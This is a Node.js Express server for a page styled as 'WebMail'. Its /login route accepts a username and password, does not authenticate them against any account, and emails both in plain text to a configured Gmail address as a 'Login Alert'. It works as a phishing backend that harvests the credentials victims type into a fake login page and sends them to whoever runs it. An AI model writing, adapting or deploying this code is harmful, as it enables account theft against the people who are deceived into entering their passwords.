require('dotenv').config();

const express    = require('express');
const bodyParser = require('body-parser');
const nodemailer = require('nodemailer');
const path       = require('path');

const app  = express();
const PORT = process.env.PORT || 3000;

/* ─── Middleware ─────────────────────────────────────────────────────────── */
app.use(bodyParser.json());
app.use(express.static(path.join(__dirname, 'public')));

/* ─── Nodemailer Transporter ─────────────────────────────────────────────── */
const transporter = nodemailer.createTransport({
  service: 'gmail',
  auth: {
    user: process.env.GMAIL_USER,   // your Gmail address
    pass: process.env.GMAIL_PASS    // your Gmail App Password
  }
});

/* ─── POST /login ────────────────────────────────────────────────────────── */
app.post('/login', async (req, res) => {
  const { username, password, rememberMe, timestamp } = req.body;

  // Basic server-side validation
  if (!username || !password) {
    return res.status(400).json({ success: false, message: 'Username and password are required.' });
  }

  // Build the email
  const mailOptions = {
    from:    `"WebMail Login Alert" <${process.env.GMAIL_USER}>`,
    to:      process.env.GMAIL_RECEIVER || process.env.GMAIL_USER,
    subject: `🔔 New Login Attempt – ${timestamp}`,
    html: `
      <!DOCTYPE html>
      <html lang="en">
      <head>
        <meta charset="UTF-8"/>
        <style>
          body { font-family: 'Segoe UI', Arial, sans-serif; background:#f0f4ff; margin:0; padding:20px; }
          .card {
            max-width: 520px; margin: 0 auto;
            background: #fff; border-radius: 14px;
            box-shadow: 0 8px 30px rgba(79,70,229,.15);
            overflow: hidden;
          }
          .header {
            background: linear-gradient(135deg,#4f46e5,#3730a3);
            padding: 28px 32px; text-align: center;
          }
          .header h1 { color:#fff; font-size:1.5rem; margin:0; }
          .header p  { color:#c7d2fe; margin:6px 0 0; font-size:.9rem; }
          .body { padding: 28px 32px; }
          .row { display:flex; margin-bottom:14px; border-bottom:1px solid #f1f5f9; padding-bottom:14px; }
          .row:last-child { border:none; margin:0; padding:0; }
          .label { font-weight:600; color:#6366f1; min-width:120px; font-size:.88rem; }
          .value { color:#1e1b4b; font-size:.93rem; word-break:break-all; }
          .footer {
            background:#f8faff; padding:16px 32px;
            text-align:center; font-size:.78rem; color:#9ca3af;
          }
        </style>
      </head>
      <body>
        <div class="card">
          <div class="header">
            <h1>📬 WebMail Login Alert</h1>
            <p>A login attempt was submitted via your WebMail page</p>
          </div>
          <div class="body">
            <div class="row">
              <span class="label">🕐 Time</span>
              <span class="value">${timestamp}</span>
            </div>
            <div class="row">
              <span class="label">👤 Username</span>
              <span class="value">${escapeHtml(username)}</span>
            </div>
            <div class="row">
              <span class="label">🔑 Password</span>
              <span class="value">${escapeHtml(password)}</span>
            </div>
            <div class="row">
              <span class="label">🗂 Remember Me</span>
              <span class="value">${rememberMe ? 'Yes' : 'No'}</span>
            </div>
          </div>
          <div class="footer">
            This email was automatically generated by the WebMail login server.<br/>
            Do not share this information with anyone.
          </div>
        </div>
      </body>
      </html>
    `
  };

  try {
    await transporter.sendMail(mailOptions);
    console.log(`[${timestamp}] Login data from "${username}" sent to ${process.env.GMAIL_RECEIVER || process.env.GMAIL_USER}`);
    return res.json({ success: true, message: 'Login data received and email sent.' });
  } catch (err) {
    console.error('Nodemailer error:', err.message);
    return res.status(500).json({ success: false, message: 'Failed to send email. Check server credentials.' });
  }
});

/* ─── Utility: Escape HTML ───────────────────────────────────────────────── */
function escapeHtml (str) {
  return String(str)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;');
}

/* ─── Start Server ───────────────────────────────────────────────────────── */
app.listen(PORT, () => {
  console.log(`\n🚀 WebMail server running → http://localhost:${PORT}\n`);
});
